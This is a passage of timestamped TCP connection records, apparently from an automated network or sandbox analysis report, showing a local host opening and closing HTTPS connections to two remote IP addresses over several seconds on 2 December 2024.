                                                                                                                                                                                                        Dec 2, 2024 07:39:21.697782993 CET4434991313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.749639034 CET4434991013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.749720097 CET4434991013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.749771118 CET49910443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.750111103 CET49910443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.750132084 CET4434991013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.750144005 CET49910443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.750150919 CET4434991013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.755754948 CET49914443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.755795002 CET4434991413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.755858898 CET49914443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.756328106 CET49914443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.756342888 CET4434991413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.802284956 CET4434990913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.803522110 CET4434990813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.803630114 CET4434990813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.803675890 CET49908443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.803754091 CET49908443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.803771019 CET4434990813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.803781986 CET49908443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.803787947 CET4434990813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.805592060 CET4434990913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.805655003 CET49909443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.806682110 CET49909443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.806694031 CET4434990913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.806704998 CET49909443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.806710005 CET4434990913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.814420938 CET49915443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.814446926 CET4434991513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.814507008 CET49915443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.815805912 CET49915443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.815819025 CET4434991513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.819031954 CET49916443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.819066048 CET4434991613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.819173098 CET49916443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.819432020 CET49916443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.819447041 CET4434991613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:22.275115013 CET44349891172.217.21.36192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:22.275202990 CET44349891172.217.21.36192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:22.275348902 CET49891443192.168.2.8172.217.21.36
                                                                                                                                                                                                        Dec 2, 2024 07:39:22.529876947 CET4434991213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:22.530635118 CET49912443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:22.530682087 CET4434991213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:22.531176090 CET49912443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:22.531203032 CET4434991213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:22.976186037 CET4434991213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:22.979502916 CET4434991213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:22.979576111 CET49912443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:22.979911089 CET49912443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:22.979927063 CET4434991213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:22.979938030 CET49912443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:22.979943037 CET4434991213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:22.983834028 CET49917443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:22.983875990 CET4434991713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:22.983952045 CET49917443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:22.984093904 CET49917443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:22.984112024 CET4434991713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.415082932 CET4434991313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.415870905 CET49913443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.415904999 CET4434991313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.416382074 CET49913443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.416388988 CET4434991313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.584078074 CET49891443192.168.2.8172.217.21.36
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.584116936 CET44349891172.217.21.36192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.599467039 CET4434991613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.600023031 CET49916443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.600040913 CET4434991613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.600563049 CET49916443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.600569963 CET4434991613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.602629900 CET4434991413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.603060007 CET49914443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.603081942 CET4434991413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.603540897 CET49914443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.603545904 CET4434991413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.661856890 CET4434991513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.664683104 CET49915443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.664719105 CET4434991513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.665772915 CET49915443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.665780067 CET4434991513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.849766970 CET4434991313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.852860928 CET4434991313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.852937937 CET49913443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.853003979 CET49913443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.853003979 CET49913443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.853034973 CET4434991313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.853045940 CET4434991313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.856152058 CET49918443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.856189966 CET4434991813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.856292963 CET49918443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.856475115 CET49918443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:23.856491089 CET4434991813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.043526888 CET4434991613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.046647072 CET4434991613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.046709061 CET4434991613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.046730995 CET49916443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.046767950 CET49916443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.046829939 CET49916443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.046829939 CET49916443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.046844959 CET4434991613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.046854973 CET4434991613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.052264929 CET49919443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.052325010 CET4434991913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.052395105 CET49919443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.052683115 CET49919443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.052696943 CET4434991913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.056149960 CET4434991413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.059245110 CET4434991413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.059331894 CET49914443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.059335947 CET4434991413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.059385061 CET49914443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.059436083 CET49914443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.059451103 CET4434991413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.059461117 CET49914443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.059467077 CET4434991413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.061681032 CET49920443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.061733961 CET4434992013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.061796904 CET49920443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.061918974 CET49920443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.061933041 CET4434992013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.120840073 CET4434991513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.120929956 CET4434991513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.121032953 CET49915443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.124327898 CET49915443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.124365091 CET4434991513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.124381065 CET49915443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.124393940 CET4434991513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.127580881 CET49921443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.127636909 CET4434992113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.127710104 CET49921443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.127861023 CET49921443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.127875090 CET4434992113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.832859039 CET4434991713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.836584091 CET49917443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.836611986 CET4434991713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.837079048 CET49917443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:24.837085009 CET4434991713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.287653923 CET4434991713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.287828922 CET4434991713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.288115978 CET49917443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.288206100 CET49917443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.288206100 CET49917443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.288223982 CET4434991713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.288237095 CET4434991713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.291646957 CET49922443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.291693926 CET4434992213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.291779995 CET49922443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.291930914 CET49922443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.291944027 CET4434992213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.653564930 CET4434991813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.654490948 CET49918443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.654516935 CET4434991813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.655190945 CET49918443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.655196905 CET4434991813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.770761013 CET4434991913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.771416903 CET49919443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.771435022 CET4434991913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.772032022 CET49919443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.772038937 CET4434991913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.777478933 CET4434992013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.778965950 CET49920443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.778994083 CET4434992013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.779326916 CET49920443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.779333115 CET4434992013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.989825010 CET4434992113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.990950108 CET49921443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.990981102 CET4434992113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.991476059 CET49921443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:25.991485119 CET4434992113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.099411011 CET4434991813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.099515915 CET4434991813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.099572897 CET49918443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.100241899 CET49918443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.100241899 CET49918443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.100264072 CET4434991813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.100277901 CET4434991813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.108722925 CET49923443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.108764887 CET4434992313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.108827114 CET49923443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.109862089 CET49923443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.109877110 CET4434992313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.205786943 CET4434991913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.208940029 CET4434991913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.208995104 CET49919443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.209084988 CET49919443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.209084988 CET49919443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.209106922 CET4434991913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.209120035 CET4434991913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.212064028 CET4434992013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.214003086 CET49924443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.214047909 CET4434992413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.214106083 CET49924443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.214440107 CET49924443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.214456081 CET4434992413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.215394974 CET4434992013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.215454102 CET49920443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.215457916 CET4434992013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.215507984 CET49920443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.215562105 CET49920443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.215562105 CET49920443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.215579033 CET4434992013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.215593100 CET4434992013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.218760967 CET49925443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.218805075 CET4434992513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.218872070 CET49925443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.219074011 CET49925443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.219085932 CET4434992513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.442897081 CET4434992113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.446594000 CET4434992113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.446646929 CET49921443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.446707010 CET49921443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.446727991 CET4434992113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.446738958 CET49921443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.446744919 CET4434992113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.451239109 CET49926443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.451282978 CET4434992613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.451351881 CET49926443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.451512098 CET49926443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:26.451518059 CET4434992613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.071971893 CET4434992213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.073612928 CET49922443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.073640108 CET4434992213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.074131966 CET49922443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.074136972 CET4434992213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.516165018 CET4434992213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.519695997 CET4434992213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.520447016 CET49922443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.520509005 CET49922443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.520529032 CET4434992213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.520556927 CET49922443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.520562887 CET4434992213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.523796082 CET49927443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.523830891 CET4434992713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.523948908 CET49927443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.524148941 CET49927443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.524163961 CET4434992713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.892839909 CET4434992313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.893471003 CET49923443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.893498898 CET4434992313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.893982887 CET49923443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.893996954 CET4434992313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.996342897 CET4434992413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.997720957 CET49924443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.997735977 CET4434992413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.998404026 CET49924443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:27.998408079 CET4434992413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.000092983 CET4434992513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.000755072 CET49925443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.000786066 CET4434992513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.001219988 CET49925443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.001231909 CET4434992513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.232903004 CET4434992613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.233611107 CET49926443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.233637094 CET4434992613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.234111071 CET49926443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.234117031 CET4434992613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.336852074 CET4434992313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.340394020 CET4434992313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.340462923 CET49923443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.340506077 CET49923443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.340517998 CET4434992313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.340529919 CET49923443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.340540886 CET4434992313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.343847036 CET49928443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.343893051 CET4434992813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.344002008 CET49928443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.344163895 CET49928443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.344180107 CET4434992813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.443093061 CET4434992413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.444605112 CET4434992513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.446192980 CET4434992413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.446247101 CET4434992413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.446253061 CET49924443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.446295023 CET49924443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.446366072 CET49924443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.446379900 CET4434992413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.446403980 CET49924443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.446408987 CET4434992413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.447799921 CET4434992513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.447890997 CET49925443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.447937012 CET49925443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.447954893 CET4434992513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.447966099 CET49925443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.447972059 CET4434992513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.449840069 CET49929443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.449872971 CET4434992913.107.246.63192.168.2.8
